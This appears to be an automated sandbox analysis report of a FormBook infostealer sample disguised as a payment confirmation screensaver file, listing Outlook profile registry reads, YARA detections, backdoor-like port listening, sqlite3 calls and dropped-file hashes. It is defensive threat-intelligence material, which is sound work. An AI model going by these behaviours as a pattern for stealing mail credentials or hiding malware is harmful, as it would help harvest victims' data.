Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E261C5 sqlite3_bind_double,sqlite3_mutex_leave,	6_2_61E261C5
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2619E sqlite3_bind_text16,	6_2_61E2619E
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26131 sqlite3_bind_text64,	6_2_61E26131
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2610A sqlite3_bind_text,	6_2_61E2610A
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E260C3 sqlite3_bind_blob64,	6_2_61E260C3
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2609C sqlite3_mutex_leave,sqlite3_bind_blob,	6_2_61E2609C
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E263CE sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,	6_2_61E263CE
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E26361 sqlite3_bind_zeroblob,sqlite3_mutex_leave,	6_2_61E26361
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03329 sqlite3_bind_parameter_name,	6_2_61E03329
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03317 sqlite3_bind_parameter_count,	6_2_61E03317
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E262E4 sqlite3_bind_pointer,sqlite3_mutex_leave,	6_2_61E262E4
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E262B3 sqlite3_bind_null,sqlite3_mutex_leave,	6_2_61E262B3
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2628D sqlite3_bind_int,sqlite3_bind_int64,	6_2_61E2628D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E03240 sqlite3_value_frombind,	6_2_61E03240
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E2623E sqlite3_bind_int64,sqlite3_mutex_leave,	6_2_61E2623E
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E264B5 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,	6_2_61E264B5
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E0A426 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,	6_2_61E0A426
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E10C58 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,	6_2_61E10C58
Source: C:\Windows\SysWOW64\finger.exe	Code function: 6_2_61E14E9B sqlite3_bind_parameter_index,	6_2_61E14E9B

Windows Analysis Report
Payent confirmation copy 00888754087.scr

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1623505
Product:	CloudBasic
Start time:	10:05:47
Start date:	25.02.2025
Sample:	Payent confirmation copy 00888754087.scr
Cookbook:	default.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	4b899b816220949de716a493b223786f
SHA1:	30ead58b9766de4d552bb448be978ac4ea3c9f3e
SHA256:	5a962362db0425ef6552d920519cacfae4fe3f86e8537fae95e44dcb6d1ad981
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3310000[1].zip	Zip archive data, at least v2.0 to extract, compression method=deflate	3BCBD3B08E4A8843FDA34512623960A2	244D3DF69BBC09A43D4AF3DE5165F50506B8D7AF	7DB638AA6B205AADBA193DC7803A7E73EB07BBEEACBACAD3A65978093E78673C
C:\Users\user\AppData\Local\Temp\11v105ky.cvg.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\4ub-1K1Qxn	SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10	8BB4851AE9495C7F93B4D8A6566E64DB	B16C29E9DBBC1E1FE5279D593811E9E317D26AF7	143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
C:\Users\user\AppData\Local\Temp\jzmh-t.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	3BCBD3B08E4A8843FDA34512623960A2	244D3DF69BBC09A43D4AF3DE5165F50506B8D7AF	7DB638AA6B205AADBA193DC7803A7E73EB07BBEEACBACAD3A65978093E78673C
C:\Users\user\AppData\Local\Temp\sqlite3.def	ASCII text	0A669FB4B0561DE62591257FDAF1EA41	CE71A1210C99D9CE66A79A033995B02FF94DD649	294BE53557A084E605E9DFA1C3141F3DB78DD63181A28DDF0676C80811593D10
C:\Users\user\AppData\Local\Temp\sqlite3.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	DDA1B03A5CD2CA37C96B7DAF5E3A8ED7	C70E5F58E61980D39608F0795879BF012DBBBCA2	79F86C1EDBBC69652A03A0F5667B3985BCF1E19F16FA3B8C7934E5B97AB8586D
C:\Users\user\AppData\Local\Temp\x1r1cxdl.kgg.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B

Windows Analysis Report Payent confirmation copy 00888754087.scr

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Payent confirmation copy 00888754087.scr

Malware Threat Intel
Provided by